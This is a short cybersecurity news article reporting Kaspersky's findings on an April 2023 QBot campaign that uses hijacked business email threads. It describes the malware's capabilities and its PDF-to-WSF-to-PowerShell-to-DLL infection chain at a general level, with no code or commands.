According to recent research from Kaspersky, a new QBot malware campaign is using hacked business communications to lure unknowing victims into installing the malware. Since it started on April 4, 2023, the most recent activity has predominantly targeted consumers in Germany, Argentina, Italy, Algeria, Spain, the United States, Russia, France, the United Kingdom, and Morocco.
A banking trojan known as QBot, sometimes known as Qakbot or Pinkslipbot, has been active at least since 2007. In addition to stealing passwords and cookies from web browsers, it also functions as a backdoor to introduce ransomware or other next-stage payloads like Cobalt Strike. The malware, which is distributed through phishing attacks, has undergone continuous upgrades throughout the course of its existence and now includes anti-VM, anti-debugging, and anti-sandbox tactics to avoid detection. According to Check Point, it has also become the most widespread malware for March 2023.
“Early on, it was distributed through infected websites and pirated software,” Kaspersky researchers said, explaining QBot’s distribution methods. “Now the banker is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings.”
Attacks that hijack email threads are nothing new. It happens when hackers enter ongoing commercial discussions or start new ones using details obtained from previously hacked email accounts. The intention is to persuade victims to click on harmful links or attachments. For example, a PDF file that seems to be an Office 365 or Azure warning.
When the document is opened, a file from a malicious website is retrieved and includes an obscured Windows Script File (.WSF). A PowerShell script that downloads a malicious DLL from a remote server is included in the script. The QBot malware has been downloaded as a DLL. The information was discovered simultaneously when Elastic Security Labs found a multi-stage social engineering effort that uses weaponized Word documents to spread Agent Tesla and XWorm using a customized .NET-based loader.